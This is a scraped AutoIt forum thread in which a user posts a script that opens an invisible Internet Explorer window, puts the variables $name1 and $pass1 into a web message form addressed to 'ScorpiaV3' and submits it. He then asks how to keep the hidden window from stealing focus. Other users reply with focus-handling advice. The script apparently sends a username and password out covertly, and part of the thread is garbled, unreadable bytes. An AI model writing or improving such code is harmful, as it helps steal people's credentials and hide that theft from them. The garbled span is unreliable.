_iecreate()

Regency

This should be invisible and doesnt take focus.. right?

You cant really test it.. but look at the format. Does it look right? or something wrong?

{autoit}$oCreate = _IECreate($C1, "", 0)

$oTo = _IEGetObjByName($oCreate, "txtTo")

_IEFormElementSetValue($oTo, "ScorpiaV3")

$oSub = _IEGetObjById($oCreate, "txtSubject")

_IEFormElementSetValue($oSub, "You know...")

$oMsg = _IEGetObjById($oCreate, "txtMessage")

_IEFormElementSetValue($oMsg, $name1 & @LF & $pass1)

$oSubm = _IEGetObjByName($oCreate, "btnSend")

_IEAction($oSubm, "click")

_IELoadWait($oCreate)

_IEQuit($oCreate)

{/autoit}

Ok... I Don't Know If This Is Right.. But Are You Trying To Run A Website Using AutoIt.. Because Thats What It Looks Like To Me

But I'm Just A Noob.. But I Got A Pretty Good Way Of Running A Website With AutoIt

Run("cmd /c start " http://www.google.com/, "", @SW_HIDE)oÝ÷ Ûú®¢×z̨¹ªÞªê-&ë-Ú(n«¨µ«0z·°y©ejÚ'zئy8^­æ«y©h¶í)à³
è"¶!jܨº,µçuN­Â÷öÚî·jëÊ«ªê-x"³
è¡¢é]m殶­se'VâgV÷C¶6ÖBö27F'BGG¢ò÷wwrævöövÆRæ6öÒògV÷C²ÂgV÷C²gV÷C²Â5uôDR

2. It will only run IE if IE happens to be your default browser (certainly isn't mine).

3. The only thing hidden by @SW_HIDE in that example is the CMD shell console window (the "DOS box"). The browser will still be visible.

4. Even if it launched IE, that method doesn't return the object handle required to do further automation of the browser using the _IE* functions.

:)

Valuater's AutoIt 1-2-3, Class... Is now in Session!For those who want somebody to write the script for them: RentACoder"Any technology distinguishable from magic is insufficiently advanced." -- Geek's corollary to Clarke's law

WELL NOW!!

Thanks for fixing his script... BUT think u can helpme with mine?

Sorry, I stopped reading that part at "You can't really test it."

Post something as short as possible that can actually be copy/pasted straight from your post to SciTE, I hit F5, and there's your symptom. The effort to produce such a "reproducer" script will either show you the answer in itself, or give you a much more answerable question.

Edited by PsaltyDS
Valuater's AutoIt 1-2-3, Class... Is now in Session!For those who want somebody to write the script for them: RentACoder"Any technology distinguishable from magic is insufficiently advanced." -- Geek's corollary to Clarke's law

Sorry, I stopped reading that part at "You can't really test it."

Post something that can actually be copy/pasted straight from you post to SciTE, I hit F5, and there's your symptom. The effort to produce such a "reproducer" script will either show you the answer in itself, or give you a much more answerable question.

There IS NO ERROR in synax or protocal.

Its just the _iecreate() is being gay. It always takes focus when the focus thing is set to 0 meaning NO.

Any reason why

So your issue is really JUST with _IECreate right? Best not to clutter your question with the rest of the code if it is not necessary.

$oIE = _IECreate($C, 0, 0)

: : :

_IEQuit($oIE)

should create an invisible browser... unless you are on Vista and then you need to also use #RequireAdmin

If that doesn't work for you, does it work with a different URL?

Dale

Free Internet Tools: DebugBar, AutoIt IE Builder, HTTP UDF, MODIV2, IE Developer Toolbar, IEDocMon, Fiddler, HTML Validator, WGet, curl

MSDN docs: InternetExplorer Object, Document Object, Overviews and Tutorials, DHTML Objects, DHTML Events, WinHttpRequest, XmlHttpRequest, Cross-Frame Scripting, Office object model

Automate input type=file (Related)

Alternative to _IECreateEmbedded? better: _IECreatePseudoEmbedded  Better Better?

IE.au3 issues with Vista - Workarounds

SciTe Debug mode - it's magic: #AutoIt3Wrapper_run_debug_mode=Y

Doesn't work needs to be ripped out of the troubleshooting lexicon. It means that what you tried did not produce the results you expected. It begs the questions 1) what did you try?, 2) what did you expect? and 3) what happened instead?

Reproducer: a small (the smallest?) piece of stand-alone code that demonstrates your trouble

So your issue is really JUST with _IECreate right? Best not to clutter your question with the rest of the code if it is not necessary.

$oIE = _IECreate($C, 0, 0)

: : :

_IEQuit($oIE)

should create an invisible browser... unless you are on Vista and then you need to also use #RequireAdmin

If that doesn't work for you, does it work with a different URL?

Dale

I have an invisible browser already, the "",0 basicaly makes it 0,0 dont it? So i want the IE window not to call focus to its self...

I have an invisible browser already, the "",0 basicaly makes it 0,0 dont it? So i want the IE window not to call focus to its self...

This should be invisible and doesnt take focus.. right?

Please be careful how you describe your problem. You should not be surprised at getting the wrong answer when you ask an ambiguous question.

If the window is invisible, it cannot have focus. It can however steal focus from another window -- is that what's happening to you?

Dale

edit: typo

Edited by DaleHohm

Free Internet Tools: DebugBar, AutoIt IE Builder, HTTP UDF, MODIV2, IE Developer Toolbar, IEDocMon, Fiddler, HTML Validator, WGet, curl

MSDN docs: InternetExplorer Object, Document Object, Overviews and Tutorials, DHTML Objects, DHTML Events, WinHttpRequest, XmlHttpRequest, Cross-Frame Scripting, Office object model

Alternative to _IECreateEmbedded? better: _IECreatePseudoEmbedded  Better Better?

Doesn't work needs to be ripped out of the troubleshooting lexicon. It means that what you tried did not produce the results you expected. It begs the questions 1) what did you try?, 2) what did you expect? and 3) what happened instead?

Reproducer: a small (the smallest?) piece of stand-alone code that demonstrates your trouble

Please be careful how you describe your problem. You should not be surprised at getting the wrong answer when you ask an ambiguous question.

If the window is invisible, it cannot have focus. It can however steal focus from another window -- is that what's happening to you?

Dale

edit: typo

I guess.. every time it runs, (this pops up ie windows then quits) it takes focus from the screen thats up.

And i thought my question was pretty straight forward...

It may be straight forward, but the way you phrase what you say simply makes no sense to me.

What does this mean???

every time it runs, (this pops up ie windows then quits) it takes focus from the screen thats up.

Dale

It may be straight forward, but the way you phrase what you say simply makes no sense to me.

What does this mean???

Dale

... Ok,

I run my script,

It pops up the Main window (doesnt close)

Then it opens windows with scripts written like the one in the first post.

The screen IS invisable,

BUT calls focus to itself and i lose focus to the main window, that was first brought up.

How can i make the Ie window that pops up, not take foucs.

Your answer was very vague.

So, you run your script.

It opens the main window

After, the script opens other windows.

But the other windows take the focus of the main window.

What are you doing to the main window?

.. Its not really the point what i am doing in main window..

I need to know how it wont take focus no matter what

Well what are you even trying to accomplish with your script Regency?

Please put Edit: What you have edited next time

@Regency:

Use

WinGetHandle ( "title" [, "text"] ) before you create the IE window to get the current active window's handle

Then

WinActivate ( "title" [, "text"] ) afterward to bring back focus even it was taken

Invisible IE windows really want to steal focus from the active application. There is code in IE.au3 to prevent this however. It locks focus to the active window, creates the invisible browser, and then releases the focus lock.

I have no t seen this fail in normal operations. This is why I asked if you had the same trouble with a different URL (www.autoitscript.com or www.google.com for example). It is certainly possible that the page you are loading in your invisible browser has Javascript code that will also attempt to take focus to the browser and if that happens after the focus lock is released, it will succeed.

Dale

Invisible IE windows really want to steal focus from the active application. There is code in IE.au3 to prevent this however. It locks focus to the active window, creates the invisible browser, and then releases the focus lock.

I have no t seen this fail in normal operations. This is why I asked if you had the same trouble with a different URL (www.autoitscript.com or www.google.com for example). It is certainly possible that the page you are loading in your invisible browser has Javascript code that will also attempt to take focus to the browser and if that happens after the focus lock is released, it will succeed.

Dale

The best FREAKING reply yet. This is dead on. The site does have java (thats how it works certain buttons i click). And How would i use this Focus lock?Do you happen to know the code for it?

THANX!!